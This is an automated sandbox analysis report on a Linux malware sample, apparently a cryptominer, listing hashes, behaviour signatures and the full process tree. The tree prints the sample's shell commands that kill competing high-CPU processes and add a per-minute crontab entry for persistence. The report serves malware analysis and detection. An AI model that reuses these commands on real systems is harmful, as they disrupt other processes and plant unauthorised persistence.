Analysis
-
max time kernel
0s -
max time network
117s -
platform
linux_amd64 -
resource
ubuntu1804-amd64-en-20211208 -
submitted
19-06-2022 22:49
General
-
Target
341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a
-
Size
969KB
-
MD5
cfbb80188473988925a9d08f4d397ab9
-
SHA1
95996dc888b95a1380efb3e85dd4ad3cd324e960
-
SHA256
341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a
-
SHA512
4efd90a2ff24719eec4ffaafde0e1aff0aeaf886b706258fe72d22491ddcbca973f0cdaa4a3b9a4207700330300692491e07d050d43eb105ce5e8ea3e0799204
Score
9/10
Malware Config
Signatures
-
Attempts to identify hypervisor via CPU configuration 1 TTPs 1 IoCs
Checks CPU information for indicators that the system is a virtual machine.
-
Modifies hosts file 1 IoCs
Adds to hosts file used for mapping hosts to IP addresses.
-
Writes DNS configuration 1 TTPs 1 IoCs
Writes data to DNS resolver config file.
-
Reads CPU attributes 1 TTPs 5 IoCs
-
Enumerates kernel/hardware configuration 1 TTPs 64 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
./341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a./341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a1⤵
- Attempts to identify hypervisor via CPU configuration
- Reads CPU attributes
- Enumerates kernel/hardware configuration
- Writes file to tmp directory
-
/bin/shsh -c "ps -eo %cpu,pid,command --sort -%cpu 2>/dev/null | head -n 2 2>/dev/null | awk '{print \$1 \" \" \$2 \" \" \$3}' 2>/dev/null |grep -v \"-bash\" 2>/dev/null |awk -v cpus=\$[threads*45] '{if(\$1>=cpus) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"2⤵
-
/usr/bin/awkawk "{print \$1 \" \" \$2 \" \" \$3}"3⤵
-
/usr/bin/headhead -n 23⤵
-
/bin/psps -eo "%cpu,pid,command" --sort "-%cpu"3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v -bash3⤵
-
/usr/bin/awkawk -v "cpus=\$[threads*45]" "{if(\$1>=cpus) print \$2}"3⤵
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done"2⤵
-
/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵
-
/usr/bin/idid -u3⤵
-
/bin/grepgrep -v grep3⤵
-
/bin/psps aux3⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v -- "-bash[[:space:]]*\$"3⤵
-
/bin/grepgrep -v /usr/sbin/httpd3⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"3⤵
-
/bin/shsh -c "dir=`pwd 2>/dev/null`;rm -rf \$dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v './341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '\$dir/'./341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a' >> .cron 2>/dev/null; if [ \$(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep './341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a\$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab \$dir/.cron 2>/dev/null; fi;rm -rf \$dir/.cron 2>/dev/null"2⤵
-
/bin/rmrm -rf /tmp/.cron3⤵
- Writes file to tmp directory
-
/bin/grepgrep -v grep3⤵
-
/usr/bin/crontabcrontab -l3⤵
-
/bin/grepgrep -v ./341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a3⤵
-
/usr/bin/crontabcrontab /tmp/.cron3⤵
- Writes file to tmp directory
-
/bin/rmrm -rf /tmp/.cron3⤵
- Writes file to tmp directory
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"2⤵
-
/usr/bin/idid -u3⤵
-
/usr/bin/crontabcrontab -l1⤵
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep "./341824d382550110cffffec8f70af0519ef46f4524536c0489c9a0459f0c4b5a\$"1⤵
-
/usr/bin/sortsort1⤵
-
/usr/bin/uniquniq1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/psps aux1⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep1⤵
-
/bin/grepgrep -- "-bash[[:space:]]*\$"1⤵
-
/usr/bin/awkawk "{if(\$3>30.0) print \$2}"1⤵
-
/usr/bin/wcwc -l1⤵
-
/bin/shsh -c "/sbin/modprobe msr > /dev/null 2>&1"1⤵
-
/sbin/modprobe/sbin/modprobe msr2⤵
- Enumerates kernel/hardware configuration